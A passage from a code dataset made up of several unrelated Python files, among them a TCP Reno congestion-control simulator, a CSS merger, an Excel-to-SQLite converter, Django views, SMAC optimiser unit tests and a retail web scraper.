self.destination = globals.idmapping['routers'][destination]\n\n # Converts the amount of data from Megabytes to bits\n self.amount = round((amount * 8 * globals.MEGABITSTOBITS) / (globals.PACKETSIZE - (20 * 8))) + 1\n\n # time at which the flow simulation starts, in s\n self.start = start\n\n self.setRTT = False\n self.state = \"slow_start\"\n # List of actual packets to be sent\n self.packets = []\n for i in range(self.amount):\n p = None\n p = Packet(self.source.id, self.id, self.destination.id, i, \\\n globals.STANDARDPACKET, '')\n self.packets.append(p)\n\n self.done = False\n self.ssthresh = 1000\n\n self.send_times = dict()\n self.dup_count = dict()\n\n # congestion signals to keep track of\n self.duplicate_count = 0\n self.duplicate_packet = -2\n self.timeout_marker = 1000\n self.next_cut_time = 0\n\n # Variables for metric tracking\n self.track = track\n self.frwindow = 600 * globals.dt\n self.frsteps = []\n self.added = False\n self.successfullytransmitted = {}\n\n # If this flow is being tracked, we set up the dictionaries for all of\n # the metrics to be tracked.\n if (track):\n for m in globals.FLOWMETRICS:\n globals.statistics[id+\":\"+m] = {}\n # Tracking what states we are in and the time\n self.states_tracker = []\n\n\n\n # Run the flow, this is the function called every dt for the flow\n def run(self):\n # If we shouldn't do anything, leave\n if self.start >= globals.systime or self.done == True:\n return\n\n # Send any available packets otherwise\n self.send_packets()\n\n # Process an acknowledgement once received\n def process_ack(self, p):\n # If we've received the acknowledgment for the last packet\n if p.data >= self.amount:\n self.done = True\n # If we're done\n if self.done:\n return\n\n # Handle duplicate packets\n if p.data == self.duplicate_packet:\n self.handle_dup_ack(p)\n return\n\n # If we're in fast_recovery with a new packet, enter congestion_avoidance\n if self.state == 'fast_recovery':\n self.state = 'congestion_avoidance'\n self.states_tracker.append((self.state, globals.systime))\n\n self.duplicate_count = 0\n self.duplicate_packet = p.data\n self.window_start = p.data\n\n # If this is first successful transmission of packet, set new rtt & rto\n if self.dup_count[p.packetid] == 1:\n self.rtt = globals.systime - self.send_times[p.packetid]\n self.rto = 2 * self.rtt\n\n # This is a new ACK, update rto\n self.timeout_marker = globals.systime + self.rto\n\n # If it's the synack, start metrics\n if p.packetid == 0:\n self.start_metrics()\n return\n\n # If we hit the threshold, enter congestion avoidance\n if self.window_size >= self.ssthresh and self.state == 'slow_start':\n self.state = 'congestion_avoidance'\n self.states_tracker.append((self.state, globals.systime))\n\n # Slow start\n if self.state == 'slow_start':\n self.window_size += 1\n self.window_start = p.data\n\n\n # Congestion avoidance\n elif self.state == 'congestion_avoidance':\n self.window_size += 1 / self.window_size\n self.window_start = p.data\n\n\n # Time to do some metric tracking\n self.track_metrics(p)\n return\n\n # Handling duplicate acknowledgements depending on the state of TCP Reno\n def handle_dup_ack(self, p):\n self.duplicate_count += 1\n # Time to enter fast recovery\n if self.state != 'fast_recovery' and self.duplicate_count == 3 and \\\n self.next_cut_time <= globals.systime:\n self.ssthresh = max(self.window_size / 2, 2)\n # Retransmit the dropped packet\n self.source.send_packet(self.packets[p.data])\n self.dup_count[p.data] = self.dup_count[p.data] + 1\n self.window_size = self.ssthresh + 3\n self.state = 'fast_recovery'\n self.states_tracker.append((self.state, globals.systime))\n self.next_cut_time = globals.systime + self.rto\n\n # Window inflation\n elif self.state == 'fast_recovery':\n # Send any packets we can send\n self.send_packets()\n\n # Sends the packets depending on the time and acks we've received\n def send_packets(self):\n # if we have timed out (not recently)\n if globals.systime >= self.timeout_marker and \\\n globals.systime >= self.next_cut_time:\n print(\"timed out at time: \", globals.systime, \"window size: \", self.window_size)\n # Enter slow_start\n self.ssthresh = max(self.window_size / 2, 2)\n self.window_size = 1\n\n # Update state and track timeout\n self.state = 'slow_start'\n self.next_cut_time = globals.systime + self.rto\n self.states_tracker.append((self.state, globals.systime))\n\n # Retransmit timed out packet and update send times and\n # dup_count\n self.source.send_packet(self.packets[self.window_start])\n self.send_times[self.window_start] = globals.systime\n self.dup_count[self.window_start] += 1\n\n # Clear out the send times for all the packets larger than\n # the current packet\n send_times_keys_copy = list(self.send_times.keys()).copy()\n for i in send_times_keys_copy:\n if i > self.window_start:\n del self.send_times[i]\n\n # Double timeout time\n self.rto = 2 * self.rto\n self.next_cut_time += self.rto\n\n elif self.state != \"fast_recovery\":\n # Send everything in the window that has not been sent\n self.send_window()\n\n # Send a window of packets if it has not been sent\n def send_window(self):\n # Send everything in the window that has not been sent\n for i in range(self.window_start, min(round(self.window_start + \\\n self.window_size), self.amount)):\n if i not in self.send_times.keys():\n # update duplicate counter\n if i not in self.dup_count.keys():\n self.dup_count[i] = 1\n else:\n self.dup_count[i] += 1\n\n # update the sent time\n self.send_times[i] = globals.systime\n\n # send the packet\n self.source.send_packet(self.packets[i])\n\n # Initialize info to start tracking metrics for the flow\n def start_metrics(self):\n self.setRTT = True\n if (self.track):\n key = self.id + \":\" + globals.FLOWRTT\n globals.statistics[key][globals.systime] = self.rtt\n return\n\n # Track the metrics on the flow\n def track_metrics(self, p):\n if self.track and (not self.done) and \\\n p.packetid not in self.successfullytransmitted.keys():\n self.successfullytransmitted[p.packetid] = 1\n self.frsteps.append(globals.PACKETSIZE)\n self.added = True\n assert globals.systime >= self.start\n\n\n # Update the flow statistics for metric tracking\n def update_flow_statistics(self):\n if self.track and (not self.done) and globals.systime >= self.start:\n # Flow Rate\n rate = 0\n if (not self.added):\n self.frsteps.append(0)\n if (len(self.frsteps) <= self.frwindow/globals.dt):\n rate = sum(self.frsteps)/(globals.systime - self.start)\n else:\n self.frsteps.pop(0)\n rate = sum(self.frsteps)/(self.frwindow)\n key = self.id + \":\" + globals.FLOWRATE\n globals.statistics[key][globals.systime] = rate\n\n # Window size\n key = self.id + \":\" + globals.WINDOWSIZE\n globals.statistics[key][globals.systime] = self.window_size\n\n # RTT\n if (self.setRTT):\n key = self.id + \":\" + globals.FLOWRTT\n globals.statistics[key][globals.systime] = self.rtt\n\n self.added = False\n\n # Function to determine if the flow has completed or not\n def completed(self):\n return self.done\n","sub_path":"flow_reno.py","file_name":"flow_reno.py","file_ext":"py","file_size_in_byte":11766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"459554394","text":"# -*- coding: utf-8 -\n#\n# This file is part of friendpaste released under Apache License, Version 2.0. \n# See the NOTICE for more information.\n\nimport re\nimport os\n\nfrom yaml import load, dump\ntry:\n from yaml import CLoader as Loader\n from yaml import CDumper as Dumper\nexcept ImportError:\n from yaml import Loader, Dumper\n \nfrom css_parser import CSSParser\n\nre_url = re.compile('url\\s*\\(([^\\s\"].*)\\)')\n\ndef read_file(fname):\n f = open(fname, 'r')\n data = f.read()\n f.close()\n return data\n\nclass MergeCSS(object):\n def __init__(self, confile):\n confdata = ''\n try:\n confdata = read_file(confile)\n except:\n pass\n \n self.conf = load(confdata, Loader=Loader)\n self.path = self.conf['css_path']\n self.src_path = \"%s/src\" % self.path\n \n def replace_url(self, mo):\n if mo.group(0).startswith('url(../'):\n return \"%s%s\" % (mo.group(0)[0:4], mo.group(0)[7:])\n \n def run(self):\n for fname, src_files in self.conf['css'].iteritems():\n output_css = ''\n for src_fname in src_files:\n src_fpath = os.path.join(self.src_path, src_fname)\n if os.path.exists(src_fpath):\n output_css += str(CSSParser(read_file(src_fpath)))\n \n output_css = re_url.sub(self.replace_url, output_css)\n \n dest_path = os.path.join(self.path, fname)\n f = open(dest_path, 'w')\n f.write(output_css)\n","sub_path":"tools/merge_css.py","file_name":"merge_css.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"637344993","text":"# -*- coding: UTF-8 -*-\n\nimport sqlite3\nimport openpyxl\nimport re\nimport datetime\nimport os\n\n\nclass ExcelToSQL(object):\n\n def __init__(self, filename):\n\n self.filename = filename\n\n wb = openpyxl.load_workbook(filename)\n sheets = wb.get_sheet_names()\n ws = wb[sheets[0]]\n\n database_file = self.making_db()\n database_name = self.signs_replacer(str(sheets[0]))\n\n col_name = []\n names = 'CREATE TABLE IF NOT EXISTS ' + database_name + ' (ID INTEGER PRIMARY KEY AUTOINCREMENT'\n col_names = list(ws.rows)\n for cell in col_names[0]:\n names += ', ' + str(self.signs_replacer(cell.value)) + ' TEXT'\n col_name.append(self.signs_replacer(cell.value))\n names += ');'\n\n database_file.execute(names)\n\n tup = []\n for i, rows in enumerate(ws):\n tuprow = []\n if i == 0:\n continue\n for row in rows:\n new_row = str(row.value).replace('\\n', ' ')\n tuprow.append(new_row.strip()) if new_row.strip() != 'None' else tuprow.append('')\n tup.append(tuple(tuprow))\n\n insQuery1 = 'INSERT INTO ' + database_name + ' ('\n insQuery2 = ''\n for col in col_name:\n insQuery1 += col + ', '\n insQuery2 += '?, '\n\n insQuery1 = insQuery1[:-2] + ') VALUES('\n insQuery2 = insQuery2[:-2] + ')'\n insQuery = insQuery1 + insQuery2\n\n database_file.executemany(insQuery, tup)\n\n database_file.commit()\n\n def making_db(self):\n \"\"\"\n Funkcja tworzy plik bazy danych na dysku, oraz jeżeli plik już istnieje to towrzy jego kopie zapasową\n :return: połączoną bazę danych ze znmienną poprzez sqlite\n \"\"\"\n date = datetime.date.today()\n db_name = str(date) + '.db'\n db_backup = db_name + \".bak\"\n file = r\"C:\\Users\\mateusz.sobek\\Desktop\\Rozwoj\\python\\projects\\cop\" + \"\\\\\" + db_name\n file_bak = r\"C:\\Users\\mateusz.sobek\\Desktop\\Rozwoj\\python\\projects\\cop\" + \"\\\\\" + db_backup\n if os.path.isfile(file):\n if os.path.isfile(file_bak):\n os.remove(file_bak)\n os.rename(file, file_bak)\n tableexport_db = sqlite3.connect(db_name)\n else:\n tableexport_db = sqlite3.connect(db_name)\n return tableexport_db\n\n def signs_replacer(self, text):\n \"\"\"\n Funkcja usuwa wszystkie znaki z tekstu oraz zamienia odstępy na podkreślniki\n :param text: tekst do przerobienia\n :return: przerobiony tekst\n \"\"\"\n self.text = text\n\n # Remove all non-word characters (everything except numbers and letters)\n text = re.sub(r\"[^\\w\\s]\", '', text)\n # Replace all runs of whitespace with a single dash\n text = re.sub(r\"\\s+\", '_', text)\n return text\n\n a = \"dupa\"","sub_path":"exceltosql.py","file_name":"exceltosql.py","file_ext":"py","file_size_in_byte":2890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"534691532","text":"# -*- coding:utf-8 -*-\r\n'''\r\nCreated on 2014年9月1日\r\n\r\n@author: liuyc\r\n'''\r\nfrom django.contrib.contenttypes.models import ContentType\r\nfrom core.layout.shortcuts import menu_render_to_response,csrf_protect\r\nfrom core.conf.models import can_distribute\r\nfrom django.contrib.auth.decorators import login_required\r\n\r\nfrom cmdb.manager import ___resource___\r\ndef global_settings_manager(request):\r\n \r\n return\r\n\r\n\r\ndef auth_ldap_manager(request):\r\n \"\"\"\r\n \r\n \"\"\"\r\n \r\n\r\n\r\nactions = ((\"删除资源\",\"delete\"),(\"资源指派\",\"distribute\"),(\"可指派管理\",\"manager\",))\r\n@csrf_protect\r\n@login_required(login_url=\"/\")\r\n\r\ndef entity_domain_relation_distribute(request,method=\"distribute\",template=\"conf/entity_distribute.html\"):\r\n \"\"\"\r\n entity of can distribute for next domain\r\n \"\"\"\r\n\r\n \r\n context_dict = dict(path=\"/background/config/entity/distribute/\",\r\n act=method,actions=actions)\r\n \r\n \r\n items = []\r\n if request.method == \"POST\":\r\n \r\n items = request.POST.getlist(\"item\")\r\n \r\n if method == \"distribute\":\r\n context_dict['items'] = ContentType.objects.filter(can_distribute__can=True)\r\n if items :\r\n can_distribute.objects.filter(content_type__id__in=items).update(dis=True)\r\n \r\n elif method == \"manager\":\r\n context_dict['items'] = ContentType.objects.filter(model__in=___resource___,\r\n app_label=\"cmdb\",can_distribute__can=None)\r\n if items :\r\n for item in ContentType.objects.filter(id__in=items):\r\n can_distribute.objects.get_or_create(content_type=item,can=True)\r\n else :\r\n context_dict['items'] = ContentType.objects.filter(can_distribute__can=True)\r\n if items :\r\n can_distribute.objects.filter(content_type__id__in=items).delete()\r\n\r\n return menu_render_to_response(request,\r\n \"conf-entity-distribute\",\"background\",template,context_dict)","sub_path":"core/conf/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"528800910","text":"import os\nimport sys\nimport unittest\nimport shutil\nimport glob\nimport re\n\nimport numpy as np\nfrom ConfigSpace import ConfigurationSpace, Configuration\n\nfrom smac.epm.rf_with_instances import RandomForestWithInstances\nfrom smac.epm.uncorrelated_mo_rf_with_instances import \\\n UncorrelatedMultiObjectiveRandomForestWithInstances\nfrom smac.facade.smac_facade import SMAC\nfrom smac.initial_design.single_config_initial_design import SingleConfigInitialDesign\nfrom smac.intensification.intensification import Intensifier\nfrom smac.optimizer.acquisition import EI, EIPS, LogEI\nfrom smac.optimizer.local_search import LocalSearch\nfrom smac.optimizer.objective import average_cost\nfrom smac.optimizer.smbo import SMBO\nfrom smac.runhistory.runhistory import RunHistory\nfrom smac.runhistory.runhistory2epm import RunHistory2EPM4Cost, \\\n RunHistory2EPM4LogCost, RunHistory2EPM4EIPS\nfrom smac.scenario.scenario import Scenario\nfrom smac.stats.stats import Stats\nfrom smac.tae.execute_func import ExecuteTAFuncArray\nfrom smac.tae.execute_ta_run import TAEAbortException, FirstRunCrashedException\nfrom smac.utils import test_helpers\nfrom smac.utils.util_funcs import get_types\n\nif sys.version_info[0] == 2:\n import mock\nelse:\n from unittest import mock\n\n\nclass ConfigurationMock(object):\n def __init__(self, value=None):\n self.value = value\n\n def get_array(self):\n return [self.value]\n\n\nclass TestSMBO(unittest.TestCase):\n\n def setUp(self):\n self.scenario = Scenario({'cs': test_helpers.get_branin_config_space(),\n 'run_obj': 'quality',\n 'output_dir': ''})\n\n def branin(self, x):\n y = (x[:, 1] - (5.1 / (4 * np.pi ** 2)) * x[:, 0] ** 2 + 5 * x[:, 0] / np.pi - 6) ** 2\n y += 10 * (1 - 1 / (8 * np.pi)) * np.cos(x[:, 0]) + 10\n\n return y[:, np.newaxis]\n\n def test_init_only_scenario_runtime(self):\n self.scenario.run_obj = 'runtime'\n self.scenario.cutoff = 300\n smbo = SMAC(self.scenario).solver\n self.assertIsInstance(smbo.model, RandomForestWithInstances)\n self.assertIsInstance(smbo.rh2EPM, RunHistory2EPM4LogCost)\n self.assertIsInstance(smbo.acquisition_func, LogEI)\n\n def test_init_only_scenario_quality(self):\n smbo = SMAC(self.scenario).solver\n self.assertIsInstance(smbo.model, RandomForestWithInstances)\n self.assertIsInstance(smbo.rh2EPM, RunHistory2EPM4Cost)\n self.assertIsInstance(smbo.acquisition_func, EI)\n\n def test_init_EIPS_as_arguments(self):\n for objective in ['runtime', 'quality']:\n self.scenario.run_obj = objective\n types, bounds = get_types(self.scenario.cs, None)\n umrfwi = UncorrelatedMultiObjectiveRandomForestWithInstances(\n ['cost', 'runtime'], types, bounds)\n eips = EIPS(umrfwi)\n rh2EPM = RunHistory2EPM4EIPS(self.scenario, 2)\n smbo = SMAC(self.scenario, model=umrfwi, acquisition_function=eips,\n runhistory2epm=rh2EPM).solver\n self.assertIs(umrfwi, smbo.model)\n self.assertIs(eips, smbo.acquisition_func)\n self.assertIs(rh2EPM, smbo.rh2EPM)\n\n def test_rng(self):\n smbo = SMAC(self.scenario, rng=None).solver\n self.assertIsInstance(smbo.rng, np.random.RandomState)\n self.assertIsInstance(smbo.num_run, int)\n smbo = SMAC(self.scenario, rng=1).solver\n rng = np.random.RandomState(1)\n self.assertEqual(smbo.num_run, 1)\n self.assertIsInstance(smbo.rng, np.random.RandomState)\n smbo = SMAC(self.scenario, rng=rng).solver\n self.assertIsInstance(smbo.num_run, int)\n self.assertIs(smbo.rng, rng)\n # ML: I don't understand the following line and it throws an error\n self.assertRaisesRegexp(TypeError,\n \"Unknown type <(class|type) 'str'> for argument \"\n 'rng. Only accepts None, int or '\n 'np.random.RandomState',\n SMAC, self.scenario, rng='BLA')\n\n def test_choose_next(self):\n seed = 42\n smbo = SMAC(self.scenario, rng=seed).solver\n smbo.runhistory = RunHistory(aggregate_func=average_cost)\n X = self.scenario.cs.sample_configuration().get_array()[None, :]\n smbo.incumbent = self.scenario.cs.sample_configuration()\n smbo.runhistory.add(smbo.incumbent, 10, 10, 1)\n\n Y = self.branin(X)\n x = next(smbo.choose_next(X, Y)).get_array()\n assert x.shape == (2,)\n \n def test_choose_next_w_empty_rh(self):\n seed = 42\n smbo = SMAC(self.scenario, rng=seed).solver\n smbo.runhistory = RunHistory(aggregate_func=average_cost)\n X = self.scenario.cs.sample_configuration().get_array()[None, :]\n\n Y = self.branin(X)\n self.assertRaises(ValueError, smbo.choose_next, **{\"X\":X, \"Y\":Y})\n\n x = next(smbo.choose_next(X, Y, incumbent_value=0.0)).get_array() \n assert x.shape == (2,)\n\n def test_choose_next_2(self):\n def side_effect(X):\n return np.mean(X, axis=1).reshape((-1, 1))\n\n smbo = SMAC(self.scenario, rng=1).solver\n smbo.incumbent = self.scenario.cs.sample_configuration()\n smbo.runhistory = RunHistory(aggregate_func=average_cost)\n smbo.runhistory.add(smbo.incumbent, 10, 10, 1)\n smbo.model = mock.Mock(spec=RandomForestWithInstances)\n smbo.acquisition_func._compute = mock.Mock(spec=RandomForestWithInstances)\n smbo.acquisition_func._compute.side_effect = side_effect\n\n X = smbo.rng.rand(10, 2)\n Y = smbo.rng.rand(10, 1)\n\n challengers = smbo.choose_next(X, Y)\n x = [c for c in challengers]\n\n self.assertEqual(smbo.model.train.call_count, 1)\n\n self.assertEqual(len(x), 2002)\n num_random_search = 0\n num_local_search = 0\n for i in range(0, 2002, 2):\n # print(x[i].origin)\n self.assertIsInstance(x[i], Configuration)\n if 'Random Search (sorted)' in x[i].origin:\n num_random_search += 1\n elif 'Local Search' in x[i].origin:\n num_local_search += 1\n # number of local search configs has to be least 10\n # since x can have duplicates\n # which can be associated with the local search\n self.assertGreaterEqual(num_local_search, 1)\n for i in range(1, 2002, 2):\n self.assertIsInstance(x[i], Configuration)\n self.assertEqual(x[i].origin, 'Random Search')\n\n def test_choose_next_3(self):\n def side_effect(X):\n return np.mean(X, axis=1).reshape((-1, 1))\n\n smbo = SMAC(self.scenario, rng=1).solver\n smbo.incumbent = self.scenario.cs.sample_configuration()\n previous_configs = [smbo.incumbent] + [self.scenario.cs.sample_configuration() for i in range(0, 20)]\n smbo.runhistory = RunHistory(aggregate_func=average_cost)\n for i in range(0, len(previous_configs)):\n smbo.runhistory.add(previous_configs[i], i, 10, 1)\n smbo.model = mock.Mock(spec=RandomForestWithInstances)\n smbo.acquisition_func._compute = mock.Mock(spec=RandomForestWithInstances)\n smbo.acquisition_func._compute.side_effect = side_effect\n\n X = smbo.rng.rand(10, 2)\n Y = smbo.rng.rand(10, 1)\n\n challengers = smbo.choose_next(X, Y)\n x = [c for c in challengers]\n\n self.assertEqual(smbo.model.train.call_count, 1)\n self.assertEqual(len(x), 2020)\n num_random_search = 0\n num_local_search = 0\n for i in range(0, 2020, 2):\n # print(x[i].origin)\n self.assertIsInstance(x[i], Configuration)\n if 'Random Search (sorted)' in x[i].origin:\n num_random_search += 1\n elif 'Local Search' in x[i].origin:\n num_local_search += 1\n # number of local search configs has to be least 10\n # since x can have duplicates\n # which can be associated with the local search\n self.assertGreaterEqual(num_local_search, 10)\n for i in range(1, 2020, 2):\n self.assertIsInstance(x[i], Configuration)\n self.assertEqual(x[i].origin, 'Random Search')\n\n def test_choose_next_empty_X(self):\n smbo = SMAC(self.scenario, rng=1).solver\n smbo.acquisition_func._compute = mock.Mock(spec=RandomForestWithInstances)\n smbo._get_next_by_random_search = mock.Mock(spec=smbo._get_next_by_random_search)\n smbo._get_next_by_random_search.return_value = [[0, 0], [0, 1], [0, 2]]\n\n X = np.zeros((0, 2))\n Y = np.zeros((0, 1))\n\n x = smbo.choose_next(X, Y)\n self.assertEqual(x, [0, 1, 2])\n self.assertEqual(smbo._get_next_by_random_search.call_count, 1)\n self.assertEqual(smbo.acquisition_func._compute.call_count, 0)\n\n def test_choose_next_empty_X_2(self):\n smbo = SMAC(self.scenario, rng=1).solver\n\n X = np.zeros((0, 2))\n Y = np.zeros((0, 1))\n\n x = smbo.choose_next(X, Y)\n self.assertEqual(len(x), 1)\n self.assertIsInstance(x[0], Configuration)\n\n @mock.patch('smac.optimizer.smbo.convert_configurations_to_array')\n @mock.patch.object(EI, '__call__')\n @mock.patch.object(ConfigurationSpace, 'sample_configuration')\n def test_get_next_by_random_search_sorted(self,\n patch_sample,\n patch_ei,\n patch_impute):\n values = (10, 1, 9, 2, 8, 3, 7, 4, 6, 5)\n patch_sample.return_value = [ConfigurationMock(i) for i in values]\n patch_ei.return_value = np.array([[_] for _ in values], dtype=float)\n patch_impute.side_effect = lambda l: values\n smbo = SMAC(self.scenario, rng=1).solver\n rval = smbo._get_next_by_random_search(10, True)\n self.assertEqual(len(rval), 10)\n for i in range(10):\n self.assertIsInstance(rval[i][1], ConfigurationMock)\n self.assertEqual(rval[i][1].value, 10 - i)\n self.assertEqual(rval[i][0], 10 - i)\n self.assertEqual(rval[i][1].origin, 'Random Search (sorted)')\n\n # Check that config.get_array works as desired and imputation is used\n # in between\n np.testing.assert_allclose(patch_ei.call_args[0][0],\n np.array(values, dtype=float))\n\n @mock.patch.object(ConfigurationSpace, 'sample_configuration')\n def test_get_next_by_random_search(self, patch):\n def side_effect(size):\n return [ConfigurationMock()] * size\n patch.side_effect = side_effect\n smbo = SMAC(self.scenario, rng=1).solver\n rval = smbo._get_next_by_random_search(10, False)\n self.assertEqual(len(rval), 10)\n for i in range(10):\n self.assertIsInstance(rval[i][1], ConfigurationMock)\n self.assertEqual(rval[i][1].origin, 'Random Search')\n self.assertEqual(rval[i][0], 0)\n\n @mock.patch.object(LocalSearch, 'maximize')\n def test_get_next_by_local_search(self, patch):\n # Without known incumbent\n class SideEffect(object):\n def __init__(self):\n self.call_number = 0\n\n def __call__(self, *args, **kwargs):\n rval = 9 - self.call_number\n self.call_number += 1\n return (ConfigurationMock(rval), [rval])\n\n patch.side_effect = SideEffect()\n smbo = SMAC(self.scenario, rng=1).solver\n rand_confs = smbo.config_space.sample_configuration(size=9)\n rval = smbo._get_next_by_local_search(init_points=rand_confs)\n self.assertEqual(len(rval), 9)\n self.assertEqual(patch.call_count, 9)\n for i in range(9):\n self.assertIsInstance(rval[i][1], ConfigurationMock)\n self.assertEqual(rval[i][1].value, 9 - i)\n self.assertEqual(rval[i][0], 9 - i)\n self.assertEqual(rval[i][1].origin, 'Local Search')\n\n # With known incumbent\n patch.side_effect = SideEffect()\n smbo.incumbent = 'Incumbent'\n rval = smbo._get_next_by_local_search(init_points=[smbo.incumbent]+rand_confs)\n self.assertEqual(len(rval), 10)\n self.assertEqual(patch.call_count, 19)\n # Only the first local search in each iteration starts from the\n # incumbent\n self.assertEqual(patch.call_args_list[9][0][0], 'Incumbent')\n for i in range(10):\n self.assertEqual(rval[i][1].origin, 'Local Search')\n\n @mock.patch.object(SingleConfigInitialDesign, 'run')\n def test_abort_on_initial_design(self, patch):\n def target(x):\n return 5\n patch.side_effect = FirstRunCrashedException()\n scen = Scenario({'cs': test_helpers.get_branin_config_space(),\n 'run_obj': 'quality', 'output_dir': '',\n 'abort_on_first_run_crash': 1})\n smbo = SMAC(scen, tae_runner=target, rng=1).solver\n self.assertRaises(FirstRunCrashedException, smbo.run)\n\n def test_intensification_percentage(self):\n def target(x):\n return 5\n def get_smbo(intensification_perc):\n \"\"\" Return SMBO with intensification_percentage. \"\"\"\n scen = Scenario({'cs': test_helpers.get_branin_config_space(),\n 'run_obj': 'quality', 'output_dir': '',\n 'intensification_percentage' : intensification_perc})\n return SMAC(scen, tae_runner=target, rng=1).solver\n # Test for valid values\n smbo = get_smbo(0.3)\n self.assertAlmostEqual(3.0, smbo._get_timebound_for_intensification(7.0))\n smbo = get_smbo(0.5)\n self.assertAlmostEqual(0.03, smbo._get_timebound_for_intensification(0.03))\n smbo = get_smbo(0.7)\n self.assertAlmostEqual(1.4, smbo._get_timebound_for_intensification(0.6))\n # Test for invalid <= 0\n smbo = get_smbo(0)\n self.assertRaises(ValueError, smbo.run)\n smbo = get_smbo(-0.2)\n self.assertRaises(ValueError, smbo.run)\n # Test for invalid >= 1\n smbo = get_smbo(1)\n self.assertRaises(ValueError, smbo.run)\n smbo = get_smbo(1.2)\n self.assertRaises(ValueError, smbo.run)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"test/test_smbo/test_smbo.py","file_name":"test_smbo.py","file_ext":"py","file_size_in_byte":14426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"451912684","text":"from django.conf.urls import url\nfrom . import views\nfrom django.views.generic import TemplateView\n\napp_name = 'auth_model'\n\nurlpatterns = [\n url(r'^login/$', TemplateView.as_view(template_name='auth_model/login.html'), name='login'), #displays a login page\n url(r'^authenticate/$', views.authenticate_method, name='authenticate_method'),# this method checks for the user with given credentials\n url(r'^success/$', TemplateView.as_view(template_name='auth_model/success.html'), name='success'), # success message after login and logout link\n url(r'^logout/$', views.logout, name='logout'),# logout function\n url(r'^create_new_user/$', views.create_new_user, name='create_new_user'), #method to create a new user using the given credentials\n url(r'^sign_up/$', TemplateView.as_view(template_name='auth_model/sign_up.html'), name='sign_up'), # sign up page\n]\n","sub_path":"auth_model/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"84516917","text":"import os\nimport yaml\n\n# The purpose of this file is to load the yaml file in memory and pass it\n# around to other module around.\n\nconfig_path = os.environ.get('some shell variable if you want')\nif config_path is None:\n config = yaml.load(open(os.path.dirname(__file__) + '/../settings.yaml'))\nelse:\n config = yaml.load(open(config_path))\n","sub_path":"spaceshare/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"532706153","text":"#conding=utf-8\r\nclass Solution(object):\r\n def rotate(self, string, k):\r\n #旋转字符串\r\n n = len(string)\r\n if k == 0 or n == 0:\r\n return\r\n \r\n k %= n#考虑k大于n的时候\r\n\r\n s = (string[k-1::-1] + string[:k-1:-1])[::-1]\r\n return s\r\n \r\n\r\na = Solution()\r\nc = 'abcdefg'\r\nb = a.rotate(c,3)\r\nprint(b)\r\n","sub_path":"LeetCode/rotate_str.py","file_name":"rotate_str.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"470591188","text":"import json\nimport logging\nimport re\nfrom decimal import Decimal\n\nfrom bs4 import BeautifulSoup\n\nfrom storescraper.product import Product\nfrom storescraper.store import Store\nfrom storescraper.categories import EXTERNAL_STORAGE_DRIVE, MEMORY_CARD, \\\n MOUSE, KEYBOARD, HEADPHONES, STEREO_SYSTEM, TABLET, USB_FLASH_DRIVE, \\\n GAMING_CHAIR, VIDEO_GAME_CONSOLE, MICROPHONE\nfrom storescraper.utils import session_with_proxy, remove_words\n\n\nclass GamesLegends(Store):\n @classmethod\n def categories(cls):\n return [\n MOUSE,\n KEYBOARD,\n HEADPHONES,\n GAMING_CHAIR,\n VIDEO_GAME_CONSOLE,\n MICROPHONE,\n EXTERNAL_STORAGE_DRIVE,\n USB_FLASH_DRIVE,\n STEREO_SYSTEM,\n TABLET,\n MEMORY_CARD,\n ]\n\n @classmethod\n def discover_urls_for_category(cls, category, extra_args=None):\n url_extension = [\n ['9-consolas', VIDEO_GAME_CONSOLE],\n ['85-discos-externos', EXTERNAL_STORAGE_DRIVE],\n ['88-pendrives', USB_FLASH_DRIVE],\n ['90-tarjetas-de-memoria-', MEMORY_CARD],\n ['92-audifonos-', HEADPHONES],\n ['97-parlantes-', STEREO_SYSTEM],\n ['99-teclados-', KEYBOARD],\n ['100-audifonos-gamers-', HEADPHONES],\n ['102-teclados-gamers-', KEYBOARD],\n ['103-mouse', MOUSE],\n ['105-sillas', GAMING_CHAIR],\n ['106-microfonos-', MICROPHONE],\n ['120-tablets', TABLET],\n ]\n session = session_with_proxy(extra_args)\n product_urls = []\n for url_extension, local_category in url_extension:\n if local_category != category:\n continue\n page = 1\n while True:\n if page > 10:\n raise Exception('page overflow: ' + url_extension)\n url_webpage = 'https://www.gameslegends.cl/{}?page=' \\\n '{}'.format(url_extension, page)\n print(url_webpage)\n res = session.get(url_webpage)\n\n if res.status_code == 404:\n if page == 1:\n logging.warning('Empty category: ' + url_extension)\n break\n\n soup = BeautifulSoup(res.text, 'html.parser')\n product_containers = soup.find('div', 'products')\n\n if not product_containers:\n if page == 1:\n logging.warning('Empty category: ' + url_extension)\n break\n\n product_containers = product_containers.findAll(\n 'article', 'product-miniature')\n\n if not product_containers:\n if page == 1:\n logging.warning('Empty category: ' + url_extension)\n break\n for container in product_containers:\n product_url = container.find('a')['href']\n product_urls.append(product_url)\n page += 1\n return product_urls\n\n @classmethod\n def products_for_url(cls, url, category=None, extra_args=None):\n print(url)\n session = session_with_proxy(extra_args)\n response = session.get(url)\n soup = BeautifulSoup(response.text, 'html.parser')\n\n key = soup.find('input', {'id': 'product_page_product_id'})['value']\n name = soup.find('title').text.strip()\n sku = soup.find('span', {'itemprop': 'sku'}).text.replace('SKU: ', '')\n\n if 'disabled' in soup.find('button', 'add-to-cart').attrs:\n stock = 0\n else:\n stock = -1\n\n price = Decimal(soup.find('span', {'itemprop': 'price'})['content'])\n\n picture_urls = []\n picture_container = soup.find('div', 'swiper-wrapper')\n for i in picture_container.findAll('img'):\n picture_urls.append(i['content'])\n\n p = Product(\n name,\n 